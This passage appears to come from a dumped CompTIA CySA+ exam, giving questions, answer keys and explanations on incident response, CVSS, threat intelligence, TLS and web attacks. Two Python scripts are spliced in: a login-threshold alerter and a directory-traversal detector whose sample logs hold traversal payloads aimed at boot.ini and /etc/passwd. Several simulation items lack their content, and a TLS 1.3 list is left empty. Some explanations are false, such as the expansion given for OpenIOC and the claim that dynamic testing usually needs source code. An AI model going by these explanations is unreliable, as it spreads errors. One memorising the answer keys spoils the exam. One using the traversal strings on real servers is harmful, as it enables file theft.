receive from various security tools or systems, such as DLP (Data Loss Prevention) or CASB (Cloud
Access Security Broker). DLP is a security solution that helps to prevent unauthorized access, use, or
transfer of sensitive data, such as personal information, intellectual property, or financial records. CASB is
a security solution that helps to monitor and control the use of cloud-based applications and services, such
as SaaS (Software as a Service), PaaS (Platform as a Service), or IaaS (Infrastructure as a Service). Both
DLP and CASB can generate alerts when they detect potential data breaches, policy violations, or
malicious activities, but they can also produce false positives, irrelevant information, or duplicate
notifications that can overwhelm or distract the security analysts. Analyst alert fatigue can have negative
consequences for the security posture and performance of an organization, such as missing or ignoring
critical alerts, delaying or skipping investigations or remediations, making errors or mistakes, or losing
motivation or morale. Therefore, it is important to reduce analyst alert fatigue and optimize the alert
management process by using various strategies, such as tuning the alert thresholds and rules, prioritizing
and triaging the alerts based on severity and context, enriching and correlating the alerts with additional
data sources, automating or orchestrating repetitive or low-level tasks or actions, or integrating and
consolidating different security tools or systems into a unified platform. By reducing analyst alert fatigue
and optimizing the alert management process, the effort hopes to achieve a decrease in the MTTR, which
is a metric that measures the average time it takes to resolve an incident from the moment it is reported to
the moment it is closed. A lower MTTR indicates a faster and more effective incident response process,
which can help to minimize the impact and damage of security incidents, improve customer satisfaction
and trust, and enhance security operations and outcomes. The other options are not as relevant or realistic
as the MTTR decreases by 20%, as they do not reflect the best possible outcome that this effort hopes to
achieve. SIEM ingestion logs are reduced by 20% is not a relevant outcome, as it does not indicate any
improvement in the incident response process or any reduction in analyst alert fatigue. SIEM (Security
Information and Event Management) is a security solution that collects and analyzes data from various
sources, such as logs, events, or alerts, and provides security monitoring, threat detection, and incident
response capabilities. SIEM ingestion logs are records of the data that is ingested by the SIEM system
from different sources. Reducing SIEM ingestion logs may imply less data volume or less data sources for
the SIEM system, which may not necessarily improve its performance or accuracy. Phishing alerts drop by
20% is not a realistic outcome, as it does not depend on the integration of DLP and CASB or any reduction
in analyst alert fatigue. Phishing alerts are notifications that indicate potential phishing attempts or attacks,
such as fraudulent emails, websites, or messages that try to trick users into revealing sensitive information
or installing malware. Phishing alerts can be generated by various security tools or systems, such as email
security solutions, web security solutions, endpoint security solutions, or user
awareness training programs. Reducing phishing alerts may imply less phishing attempts or attacks on the
organization, which may not necessarily be influenced by the integration of DLP and CASB or any
reduction in analyst alert fatigue. False positive rates drop to 20% is not a realistic outcome

QUESTION 98
Which of the following is a reason why proper handling and reporting of existing evidence are important for
the investigation and reporting phases of an incident response?

A. To ensure the report is legally acceptable in case it needs to be presented in court
B. To present a lessons-learned analysis for the incident response team
C. To ensure the evidence can be used in a postmortem analysis
D. To prevent the possible loss of a data source for further root cause analysis

Correct Answer: A
Explanation

Explanation/Reference:
To ensure the report is legally acceptable in case it needs to be presented in court. Proper handling and
reporting of existing evidence are important for the investigation and reporting phases of an incident
response because they ensure the integrity, authenticity, and admissibility of the evidence in case it needs
to be presented in court. Evidence that is mishandled, tampered with, or poorly documented may not be
accepted by the court or may be challenged by the opposing party. Therefore, incident responders should
follow the best practices and standards for evidence collection, preservation, analysis, and reporting.
The other options are not reasons why proper handling and reporting of existing evidence are important for
the investigation and reporting phases of an incident response. They are rather outcomes or benefits of
conducting a thorough and effective incident response process. A lessons-learned analysis (B) is a way to
identify the strengths and weaknesses of the incident response team and improve their performance for
future incidents. A postmortem analysis (C) is a way to determine the root cause, impact, and timeline of the
incident and provide recommendations for remediation and prevention. A root cause analysis (D) is a way
to identify the underlying factors that led to the incident and address them accordingly.

QUESTION 99
Which of the following is often used to keep the number of alerts to a manageable level when establishing
a process to track and analyze violations?

A. Log retention
B. Log rotation
C. Maximum log size
D. Threshold value

Correct Answer: D
Explanation

Explanation/Reference:
A threshold value is a parameter that defines the minimum or maximum level of a metric or event that
triggers an alert. For example, a threshold value can be set to alert when the number of failed login
attempts exceeds 10 in an hour, or when the CPU usage drops below 20% for more than 15 minutes. By
setting a threshold value, the process can filter out irrelevant or insignificant alerts and focus on the ones
that indicate a potential problem or anomaly. A threshold value can help to reduce the noise and false
positives in the alert system, and improve the efficiency and accuracy of the analysis.
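The "more than 10 failed logins in an hour" rule above is a sliding-window threshold; the following added example (not code from the dump or from CompTIA) implements it over constructed sshd-style log lines, clearing a user's window after each alert so one burst yields one alert. The log format, user names and addresses are sample values assumed for the example.

```python
"""Added example (not from the Pass2Lead dump or CompTIA): a sliding-window threshold
rule of the kind QUESTION 99 describes, alerting when a user exceeds 10 failed logins
within one hour. The syslog-style lines, users and addresses are constructed samples."""
from collections import deque
from datetime import datetime, timedelta
import re

THRESHOLD = 10               # alert once more than this many failures fall inside the window
WINDOW = timedelta(hours=1)  # trailing window over which failures are counted
FAILED_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)


def make_lines(start, user, ip, count, step):
    """Build constructed sshd-style failure lines for one source at a fixed interval (sample data only)."""
    return [
        f"{(start + i * step).isoformat()} sshd[4242]: Failed password for {user} from {ip} port 51000 ssh2"
        for i in range(count)
    ]


# Three constructed bursts merged in time order: a brute-force run against root (12 in 22 minutes),
# a handful of typos from alice, and a slow, spread-out attempt against bob (11 over 3h20m).
SAMPLE_LOGS = sorted(
    make_lines(datetime(2024, 5, 1, 2, 0), "root", "203.0.113.7", 12, timedelta(minutes=2))
    + make_lines(datetime(2024, 5, 1, 2, 5), "alice", "198.51.100.3", 5, timedelta(minutes=1))
    + make_lines(datetime(2024, 5, 1, 0, 0), "bob", "203.0.113.9", 11, timedelta(minutes=20))
)


def parse_failed_login(line):
    """Return (timestamp, user, source_ip) for a failed-password line, or None for anything else."""
    m = FAILED_RE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m.group("ts")), m.group("user"), m.group("ip")


def threshold_alerts(lines, threshold=THRESHOLD, window=WINDOW):
    """Emit one alert per user each time the failure count inside the trailing window exceeds threshold.

    The user's window is cleared after an alert, so a sustained burst produces one alert rather
    than one per additional failure; that is what keeps the alert volume manageable."""
    windows = {}  # user -> deque of (timestamp, ip) still inside the trailing window
    alerts = []
    for line in lines:
        parsed = parse_failed_login(line)
        if parsed is None:
            continue
        ts, user, ip = parsed
        q = windows.setdefault(user, deque())
        q.append((ts, ip))
        while q and ts - q[0][0] > window:  # drop entries that have aged out of the window
            q.popleft()
        if len(q) > threshold:
            alerts.append({
                "user": user,
                "count": len(q),
                "first": q[0][0].isoformat(),
                "last": ts.isoformat(),
                "sources": sorted({src for _, src in q}),
            })
            q.clear()
    return alerts


if __name__ == "__main__":
    for a in threshold_alerts(SAMPLE_LOGS):
        print(f"{a['user']}: {a['count']} failures between {a['first']} and {a['last']} from {a['sources']}")
```

Lowering the threshold (for example to 3) shows the trade-off the question points at: the same sample data then produces six alerts instead of one.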

QUESTION 100
A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating
systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication.

Which of the following does this most likely describe?

A. System hardening
B. Hybrid network architecture
C. Continuous authorization
D. Secure access service edge

Correct Answer: A
Explanation

Explanation/Reference:
System hardening is the process of securing a system by reducing its attack surface, applying patches and
updates, configuring security settings, and implementing security controls. System hardening can help
prevent or mitigate vulnerability events that may affect operating systems. Host-based IPS, firewalls, and
two-factor authentication are examples of security controls that can be applied to harden a system. The
other options are not the best descriptions of the scenario. A hybrid network architecture (B) is a network
design that combines on-premises and cloud-based resources, which may or may not involve system
hardening. Continuous authorization (C) is a security approach that monitors and validates the security
posture of a system on an ongoing basis, which is different from system hardening. Secure access service
edge (D) is a network architecture that delivers cloud-based security services to remote users and devices,
which is also different from system hardening.

QUESTION 101
Which of the following is a commonly used four-component framework to communicate threat actor
behavior?

A. STRIDE
B. Diamond Model of Intrusion Analysis
C. Cyber Kill Chain
D. MITRE ATT&CK

Correct Answer: B
Explanation

Explanation/Reference:
The Diamond Model of Intrusion Analysis is a framework that describes the relationship between four
components of a cyberattack: adversary, capability, infrastructure, and victim. It helps analysts understand
the behavior and motivation of threat actors, as well as the tools and methods they use to compromise
their targets.

References: Main Analytical Frameworks for Cyber Threat Intelligence, section 4; Strategies, tools, and
frameworks for building an effective threat intelligence team, section 3.

QUESTION 102
A company has decided to expose several systems to the internet. The systems are currently available
internally only. A security analyst is using a subset of CVSS3.1 exploitability metrics to prioritize the
vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The
systems and the vulnerabilities are shown below:

Which of the following systems should be prioritized for patching?

A. brown
B. grey
C. blane
D. sullivan

Correct Answer: C
Explanation

Explanation/Reference:
The system “blane” with the vulnerability name “snakedoctor” should be prioritized for patching as it has a
network attack vector (AV:N), low attack complexity (AC:L), and high availability (A:H). These metrics
indicate that it would be relatively easy to exploit this vulnerability over the internet, and the system is
highly available. References: According to the CVSS v3.1 Specification Document, the exploitability
metrics for CVSS are Attack Vector, Attack Complexity, Privileges Required, User Interaction, and Scope.
These metrics measure how the vulnerability is accessed, the complexity of the attack, and the level of
interaction and privileges required to exploit the vulnerability. The image shows a table with the values of
these metrics for each system and vulnerability. Based on these values, the system “blane” has the highest
exploitability score, as it has the most favorable conditions for an attacker. The other systems have either a
lower attack vector, higher attack complexity, or lower availability, which make them less exploitable.
Therefore, the system “blane” should be patched first.

Exam D

QUESTION 1
HOTSPOT

The developers recently deployed new code to three web servers. A daily automated external device scan
report shows server vulnerabilities that are failing items according to PCI DSS.

If the vulnerability is not valid, the analyst must take the proper steps to get the scan clean.

If the vulnerability is valid, the analyst must remediate the finding.

After reviewing the information provided in the network diagram, select the STEP 2 tab to complete the
simulation by selecting the correct Validation Result and Remediation Action for each server listed using
the drop-down options.

INSTRUCTIONS

STEP 1: Review the information provided in the network diagram.


STEP 2: Given the scenario, determine which remediation action is required to address the vulnerability.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.

Step 1
Hot Area:
Correct Answer:
Explanation

Explanation/Reference:

QUESTION 2
HOTSPOT

A security analyst performs various types of vulnerability scans.

Review the vulnerability scan results to determine the type of scan that was executed and if a false positive
occurred for each device.

INSTRUCTIONS

Select the Results Generated drop-down option to determine if the results were generated from a
credentialed scan, non-credentialed scan, or a compliance scan.

For ONLY the credentialed and non-credentialed scans, evaluate the results for False Positives and check
the Findings that display false positives.

NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.
Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server to the
results. The Linux Web Server, File-Print Server, and Directory Server are draggable.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
Hot Area:
Correct Answer:
QUESTION 3
HOTSPOT

A company recently experienced a security incident. The security team has determined a user clicked on a
link embedded in a phishing email that was sent to the entire company. The link resulted in a malware
download, which was subsequently installed and run.

INSTRUCTIONS

Part 1

Review the artifacts associated with the security incident. Identify the name of the malware, the malicious
IP address, and the date and time when the malware executable entered the organization.

Part 2
Review the kill chain items and select an appropriate control for each that would improve the security
posture of the organization and would have helped to prevent this incident from occurring. Each control
may only be used once, and not all controls will be used.

Firewall log:
File integrity Monitoring Report:
Malware domain list:
Vulnerability Scan Report:
Phishing Email:
Hot Area:
Correct Answer:
Explanation

Explanation/Reference:
Exam E

QUESTION 1
Which of the following makes STIX and OpenIOC information readable by both humans and machines?

A. XML
B. URL
C. OVAL
D. TAXII

Correct Answer: A
Explanation

Explanation/Reference:
The correct answer is A. XML.

STIX and OpenIOC are two standards for representing and exchanging cyber threat intelligence (CTI)
information. STIX stands for Structured Threat Information Expression and OpenIOC stands for Open
Location and Identity Coordinates. Both standards use XML as the underlying data format to encode the
information in a structured and machine-readable way. XML stands for Extensible Markup Language and
it is a widely used standard for defining and exchanging data on the web. XML uses tags, attributes, and
elements to describe the structure and meaning of the data. XML is also human-readable, as it uses plain
text and follows a hierarchical and nested structure. XML is not the only format that can be used to make
STIX and OpenIOC information readable by both humans and machines, but it is the most common and
widely supported one. Other formats that can be used include JSON, CSV, or PDF, depending on the use
case and the preferences of the information producers and consumers. However, XML has some
advantages over other formats, such as:
XML is more expressive and flexible than JSON or CSV, as it can define complex data types, schemas,
namespaces, and validation rules. XML is more standardized and interoperable than PDF, as it can be
easily parsed, transformed, validated, and queried by various tools and languages. XML is more
compatible with existing CTI standards and tools than other formats, as it is the basis for STIX 1.x, TAXII
1.x, MAEC, CybOX, OVAL, and others.
References:
1 Introduction to STIX - GitHub Pages
2 5 Best Threat Intelligence Feeds in 2023 (Free & Paid Tools) - Comparitech
3 What Are STIX/TAXII Standards? - Anomali Resources
4 What is STIX/TAXII? | Cloudflare
5 Sample Use | TAXII Project Documentation - GitHub Pages
6 Trying to retrieve xml data with taxii - Stack Overflow
7 CISA AIS TAXII Server Connection Guide
8 CISA AIS TAXII Server Connection Guide v2.0 | CISA

QUESTION 2
Which of the following describes a contract that is used to define the various levels of maintenance to be
provided by an external business vendor in a secure environment?

A. MOU
B. NDA
C. BIA
D. SLA

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: SLA stands for Service Level Agreement, which is a contract that defines the various levels of
maintenance to be provided by an external business vendor in a secure environment. An SLA specifies the
expectations, responsibilities, and obligations of both parties, such as the scope, quality, availability, and
performance of the service, as well as the metrics and methods for measuring and reporting the service
level. An SLA also outlines the penalties or remedies for any breach or failure of the service level. An SLA
can help ensure that the external business vendor delivers the service in a timely, consistent, and secure
manner, and that the customer receives the service that meets their needs and requirements.
Official References:
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.comptia.org/certifications/cybersecurity-analyst
https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered

QUESTION 3
Which of the following can be used to learn more about TTPs used by cybercriminals?

A. ZenMAP
B. MITRE ATT&CK
C. National Institute of Standards and Technology
D. theHarvester

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques
based on real-world observations. It is used as a foundation for the development of specific threat models
and methodologies in the private sector, in government, and in the cybersecurity product and service
community. It can help security professionals understand, detect, and mitigate cyber threats by providing a
comprehensive framework of TTPs.
References: MITRE ATT&CK, Getting Started with ATT&CK, MITRE ATT&CK | MITRE

QUESTION 4
While reviewing the web server logs, a security analyst notices the following snippet: ..\../..\../boot.ini

Which of the following is being attempted?

A. Directory traversal
B. Remote file inclusion
C. Cross-site scripting
D. Remote code execution
E. Enumeration of /etc/passwd

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The log entry "..\../..\../boot.ini" is indicative of a directory traversal attack. This type of
attack aims to access files and directories that are stored outside the web root folder. By manipulating
variables that reference files with "../" (dot-dot-slash) sequences, here mixed with the "..\" backslash form,
the attacker may be able to access arbitrary files and directories stored on the file system.
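How a defender would pick such entries out of an access log, as an added example that is not part of the original question or its explanation: the Python script below percent-decodes each request target repeatedly (so double-encoded "%252e%252e" is seen as ".."), treats backslashes as path separators, and flags a request only when a "../" sequence actually climbs above the directory it started in, so "/docs/../docs/readme.txt" is not reported. The log lines are constructed for this example in Common Log Format; the IP addresses and paths are invented.

```python
"""Detect directory-traversal attempts in web-server access logs (added example)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Common Log Format); addresses and paths are invented.
SAMPLE_LOG = r"""
10.0.0.5 - - [12/Mar/2024:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 1043
10.0.0.9 - - [12/Mar/2024:10:01:30 +0000] "GET /download?file=..\../..\../boot.ini HTTP/1.1" 404 312
10.0.0.9 - - [12/Mar/2024:10:01:31 +0000] "GET /download?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1552
10.0.0.9 - - [12/Mar/2024:10:01:32 +0000] "GET /download?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1552
10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /docs/../docs/readme.txt HTTP/1.1" 200 88
"""

# Pulls method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(value, max_rounds=3):
    """Undo percent-encoding repeatedly so double-encoded '%252e%252e' is seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def climbs_above_base(component):
    """True if walking the '/'-separated component ever rises above its starting directory.
    Backslashes count as separators because Windows servers accept them (see the boot.ini entry)."""
    depth = 0
    for segment in decode_fully(component).replace("\\", "/").split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def is_traversal(target):
    """Check the path and every query-string value; traversal usually rides in a parameter."""
    parts = urlsplit(target)
    if climbs_above_base(parts.path):
        return True
    return any(climbs_above_base(v) for _, v in parse_qsl(parts.query, keep_blank_values=True))


def find_traversal_attempts(log_text):
    """Return (client_ip, normalised_target) for each flagged request line."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and is_traversal(match.group("target")):
            normalised = decode_fully(match.group("target")).replace("\\", "/")
            hits.append((line.split()[0], normalised))
    return hits


if __name__ == "__main__":
    for ip, target in find_traversal_attempts(SAMPLE_LOG):
        print(f"{ip:12s} {target}")
```

Note that a 404 on the boot.ini request does not mean the attempt was harmless: the same client's later requests returned 200 with a body, so the analyst should check what the download handler actually served before closing the alert.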

QUESTION 5
While a security analyst for an organization was reviewing logs from web servers, the analyst found
several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible
to padding oracle attacks. Which of the following combinations of configuration changes should the
organization make to remediate this issue? (Select two).

A. Configure the server to prefer TLS 1.3.
B. Remove cipher suites that use CBC.
C. Configure the server to prefer ephemeral modes for key exchange.
D. Require client browsers to present a user certificate for mutual authentication.
E. Configure the server to require HSTS.
F. Remove cipher suites that use GCM.

Correct Answer: AB
Explanation

Explanation/Reference:
The correct answer is A. Configure the server to prefer TLS 1.3 and B. Remove cipher suites that use
CBC.

A padding oracle attack is a type of attack that exploits the padding validation of a cryptographic message
to decrypt the ciphertext without knowing the key. A padding oracle is a system that responds to queries
about whether a message has a valid padding or not, such as a web server that returns different error
messages for invalid padding or invalid MAC. A padding oracle attack can be applied to the CBC mode of
operation, where the attacker can manipulate the ciphertext blocks and use the oracle's responses to
recover the plaintext [1][2].

To remediate this issue, the organization should make the following configuration changes:

Configure the server to prefer TLS 1.3. TLS 1.3 is the latest version of the Transport Layer Security
protocol, which provides secure communication between clients and servers. TLS 1.3 has several security
improvements over previous versions, such as:

Remove cipher suites that use CBC. Cipher suites are combinations of cryptographic algorithms that
specify how TLS connections are secured. Cipher suites that use CBC mode are vulnerable to padding
oracle attacks, as well as other attacks such as BEAST and Lucky 13. Therefore, they should be removed
from the server's configuration and replaced with cipher suites that use more secure modes of operation,
such as GCM or CCM [7][8].

The other options are not effective or necessary to remediate this issue. Option C is not effective because
configuring the server to prefer ephemeral modes for key exchange does not prevent padding oracle
attacks. Ephemeral modes for key exchange are methods that generate temporary and random keys for
each session, such as Diffie-Hellman or Elliptic Curve Diffie-Hellman. Ephemeral modes provide forward
secrecy, which means that compromising the long-term keys does not affect the security of past sessions.
However, ephemeral modes do not protect against padding oracle attacks, which exploit the padding
validation of the ciphertext rather than the key exchange [9]. Option D is not necessary because requiring
client browsers to present a user certificate for mutual authentication does not prevent padding oracle
attacks. Mutual authentication is a process that verifies the identity of both parties in a communication,
such as using certificates or passwords. Mutual authentication enhances security by preventing
impersonation or spoofing attacks. However, mutual authentication does not protect against padding oracle
attacks, which exploit the padding validation of the ciphertext rather than the authentication [10]. Option E
is not necessary because configuring the server to require HSTS does not prevent padding oracle attacks.
HSTS stands for HTTP Strict Transport Security and it is a mechanism that forces browsers to use HTTPS
connections instead of HTTP connections when communicating with a web server. HSTS enhances
security by preventing downgrade or man-in-the-middle attacks that try to intercept or modify HTTP traffic.
However, HSTS does not protect against padding oracle attacks, which exploit the padding validation of
HTTPS traffic rather than the protocol [11]. Option F is not effective because removing cipher suites that
use GCM does not prevent padding oracle attacks. GCM stands for Galois/Counter Mode and it is a mode
of operation that provides both encryption and authentication for block ciphers, such as AES. GCM is more
secure and efficient than CBC mode, as it prevents various types of attacks, such as padding oracle,
BEAST, Lucky 13, and IV reuse attacks [12][13]. Therefore, removing cipher suites that use GCM would
reduce security rather than enhance it.
References:
1 Padding oracle attack - Wikipedia
2 flast101/padding-oracle-attack-explained - GitHub
3 A Cryptographic Analysis of the TLS 1.3 Handshake Protocol | Journal of Cryptology
4 Which block cipher mode of operation does TLS 1.3 use? - Cryptography Stack Exchange
5 The Essentials of Using an Ephemeral Key Under TLS 1.3
6 Guidelines for the Selection, Configuration, and Use of ... - NIST
7 CBC decryption vulnerability - .NET | Microsoft Learn
8 The Padding Oracle Attack | Robert Heaton
9 What is Ephemeral Diffie-Hellman? | Cloudflare
10 What is Mutual TLS? How mTLS Authentication Works | Cloudflare
11 What is HSTS? HTTP Strict Transport Security Explained | Cloudflare
12 Galois/Counter Mode - Wikipedia
13 AES-GCM and its IV/nonce value - Cryptography Stack Exchange

QUESTION 6
A systems administrator notices unfamiliar directory names on a production server. The administrator
reviews the directory listings and files, and then concludes the server has been compromised. Which of the
following steps should the administrator take next?

A. Inform the internal incident response team.
B. Follow the company's incident response plan.
C. Review the lessons learned for the best approach.
D. Determine when the access started.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: An incident response plan is a set of predefined procedures and guidelines that an
organization follows when faced with a security breach or attack. An incident response plan helps to
ensure that the organization can quickly and effectively contain, analyze, eradicate, and recover from the
incident, as well as prevent or minimize the damage and impact to the business operations, reputation, and
customers. An incident response plan also defines the roles and responsibilities of the incident response
team, the communication channels and protocols, the escalation and reporting procedures, and the tools
and resources available for the incident response. By following the company's incident response plan, the
administrator can ensure that they are following the best practices and standards for handling a security
incident, and that they are coordinating and collaborating with the relevant stakeholders and authorities.
Following the company's incident response plan can also help to avoid or reduce any legal, regulatory, or
contractual liabilities or penalties that may arise from the incident. The other options are not as effective or
appropriate as following the company's incident response plan. Informing the internal incident response
team (A) is a good step, but it should be done according to the company's incident response plan, which
may specify who, when, how, and what to report. Reviewing the lessons learned for the best approach (C) is
a good step, but it should be done after the incident has been resolved and closed, not during the active
response phase. Determining when the access started (D) is a good step, but it should be done as part of
the analysis phase of the incident response plan, not before following the plan.

QUESTION 7
A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the
following should the analyst perform next?

A. Eradication
B. Isolation
C. Reporting
D. Forensic analysis

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: After recovering a compromised server to its previous state, the analyst should perform
forensic analysis to determine the root cause, impact, and scope of the incident, as well as to identify any
indicators of compromise, evidence, or artifacts that can be used for further investigation or prosecution.
References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 6, page 244; CompTIA
CySA+ CS0-003 Certification Study Guide, Chapter 6, page 253.

QUESTION 8
A company has a primary control in place to restrict access to a sensitive database. However, the
company discovered an authentication vulnerability that could bypass this control. Which of the following is
the best compensating control?

A. Running regular penetration tests to identify and address new vulnerabilities
B. Conducting regular security awareness training of employees to prevent social engineering attacks
C. Deploying an additional layer of access controls to verify authorized individuals
D. Implementing intrusion detection software to alert security teams of unauthorized access attempts

Correct Answer: C
Explanation

Explanation/Reference:
Deploying an additional layer of access controls to verify authorized individuals is the best compensating
control for the authentication vulnerability that could bypass the primary control. A compensating control is
a security measure that is implemented to mitigate the risk of a vulnerability or a threat when the primary
control is not sufficient or feasible. A compensating control should provide a similar or greater level of
protection as the primary control, and should be closely related to the vulnerability or the threat it is
addressing [1]. In this case, the primary control is to restrict access to a sensitive database, and the
vulnerability is an authentication bypass. Therefore, the best compensating control is to deploy an
additional layer of access controls, such as multifactor authentication, role-based access control, or
encryption, to verify the identity and the authorization of the individuals who are accessing the database.
This way, the compensating control can prevent unauthorized access to the database, even if the primary
control is bypassed [2][3]. Running regular penetration tests, conducting regular security awareness
training, and implementing intrusion detection software are all good security practices, but they are not
compensating controls for the authentication vulnerability, as they do not provide a similar or greater level
of protection as the primary control, and they are not closely related to the vulnerability or the threat they
are addressing.
References: Compensating Controls: An Impermanent Solution to an IT ... - Tripwire, What is Multifactor
Authentication (MFA)? | Duo Security, Role-Based Access Control (RBAC) and Role-Based Security,
[What is a Penetration Test and How Does It Work?]

QUESTION 9
Which of the following best describes the goal of a disaster recovery exercise as preparation for possible
incidents?

A. To provide metrics and test continuity controls
B. To verify the roles of the incident response team
C. To provide recommendations for handling vulnerabilities
D. To perform tests against implemented security controls

Correct Answer: A
Explanation

Explanation/Reference:
The correct answer is A. To provide metrics and test continuity controls.

A disaster recovery exercise is a simulation or a test of the disaster recovery plan, which is a set of
procedures and resources that are used to restore the normal operations of an organization after a
disaster or a major incident. The goal of a disaster recovery exercise is to provide metrics and test
continuity controls, which are the measures that ensure the availability and resilience of the critical systems
and processes of an organization. A disaster recovery exercise can help evaluate the effectiveness,
efficiency, and readiness of the disaster recovery plan, as well as identify and address any gaps or issues .
The other options are not the best descriptions of the goal of a disaster recovery exercise. Verifying the
roles of the incident response team (B) is a goal of an incident response exercise, which is a simulation or
a test of the incident response plan, which is a set of procedures and roles that are used to detect, contain,
analyze, and remediate an incident. Providing recommendations for handling vulnerabilities (C) is a goal of a
vulnerability assessment, which is a process of identifying and prioritizing the weaknesses and risks in an
organization's systems or network. Performing tests against implemented security controls (D) is a goal of
a penetration test, which is an authorized and simulated attack on an organization's systems or network to
evaluate their security posture and identify any vulnerabilities or misconfigurations.

QUESTION 10
A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment.
In collecting scheduled tasks from all enterprise workstations, the following host details are aggregated:
Which of the following actions should the hunter perform first based on the details above?

A. Acquire a copy of taskhw.exe from the impacted host
B. Scan the enterprise to identify other systems with taskhw.exe present
C. Perform a public search for malware reports on taskhw.exe.
D. Change the account that runs the taskhw.exe scheduled task

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The first step should be to perform a public search for malware reports on taskhw.exe, as this
file is suspicious for several reasons: it is located in a non-standard path, it has a high CPU usage, it is
signed by an unknown entity, and it is only present on one host. A public search can help to determine if
this file is a known malware or a legitimate program. If it is malware, the hunter can then take appropriate
actions to remove it and prevent further damage. The other options are either premature or ineffective, as
they do not provide enough information to assess the threat level of taskhw.exe. References:
Cybersecurity Analyst+ - CompTIA, taskhw.exe Windows process
- What is it? - file.net, Taskhostw.exe - What Is Taskhostw.exe & Is It Malware? - MalwareTips Forums

QUESTION 11
A security analyst observed the following activity from a privileged account:

Accessing emails and sensitive information
Audit logs being modified
Abnormal log-in times

Which of the following best describes the observed activity?

A. Irregular peer-to-peer communication
B. Unauthorized privileges
C. Rogue devices on the network
D. Insider attack

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: The observed activity from a privileged account indicates an insider attack, which is when a
trusted user or employee misuses their access rights to compromise the security of the organization.
Accessing emails and sensitive information, modifying audit logs, and logging in at abnormal times are all
signs of malicious behavior by a privileged user who may be trying to steal, tamper, or destroy data, or
cover their tracks. An insider attack can cause significant damage to the organization's reputation,
operations, and compliance [1][2]. References: The Privileged Identity Playbook Guides Management of
Privileged User Accounts, How to Track Privileged Users' Activities in Active Directory

QUESTION 12
An organization is conducting a pilot deployment of an e-commerce application. The application's source
code is not available. Which of the following strategies should an analyst recommend to evaluate the
security of the software?

A. Static testing
B. Vulnerability testing
C. Dynamic testing
D. Penetration testing

Correct Answer: D
Explanation
Explanation/Reference:
Explanation: Penetration testing is the best strategy to evaluate the security of the software without the
source code. Penetration testing is a type of security testing that simulates real-world attacks on the
software to identify and exploit its vulnerabilities. Penetration testing can be performed on the software as
a black box, meaning that the tester does not need to have access to the source code or the internal
structure of the software. Penetration testing can help the analyst to assess the security posture of the
software, the potential impact of the vulnerabilities, and the effectiveness of the existing security
controls [1][2]. Static testing, vulnerability testing, and dynamic testing are other types of security testing, but
they usually require access to the source code or the internal structure of the software. Static testing is the
analysis of the software code or design without executing it. Vulnerability testing is the identification and
evaluation of the software weaknesses or flaws. Dynamic testing is the analysis of the software code or
design while executing it [3][4][5]. References: Penetration Testing - OWASP, What is a Penetration Test and
How Does It Work?, Static Code Analysis | OWASP Foundation, Vulnerability Scanning Best Practices,
Dynamic Testing - OWASP

QUESTION 13
A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web
application. The analyst is concerned about the following output:

[+] XSS: In form input 'txtSearch' with action https://localhost/search.aspx

[-] XSS: Analyzing response #1...

[-] XSS: Analyzing response #2...

[-] XSS: Analyzing response #3...

[+] XSS: Response is tainted. Looking for proof of the vulnerability.

Which of the following is the most likely reason for this vulnerability?

A. The developer set input validation protection on the specific field of search.aspx.
B. The developer did not set proper cross-site scripting protections in the header.
C. The developer did not implement default protections in the web application build.
D. The developer did not set proper cross-site request forgery protections.

Correct Answer: B
Explanation

Explanation/Reference:
The most likely reason for this vulnerability is B. The developer did not set proper cross-site scripting
protections in the header. Cross-site scripting (XSS) is a type of web application vulnerability that allows an
attacker to inject malicious code into a web page that is viewed by other users. XSS can be used to steal
cookies, session tokens, credentials, or other sensitive information, or to perform actions on behalf of the
victim [1]. One of the common ways to prevent XSS attacks is to set proper HTTP response headers that
instruct the browser how to handle the content of the web page. For example, the Content-Type header
can specify the MIME type and character encoding of the web page, which can help the browser avoid
interpreting data as code. The X-XSS-Protection header can enable or disable the browser's built-in XSS
filter, which can block or sanitize suspicious scripts. The Content-Security-Policy header can define a
whitelist of sources and directives that control what resources and scripts can be loaded or executed on
the web page [2].
According to the output of Arachni, a web application security scanner framework [3], it detected an XSS
vulnerability in the form input 'txtSearch' with action https://localhost/search.aspx. This means that Arachni
was able to inject a malicious script into the input field and observe its execution in the response. This
indicates that the developer did not set proper cross-site scripting protections in the header of search.aspx,
which allowed Arachni to bypass the browser's default security mechanisms and execute arbitrary code on
the web page.
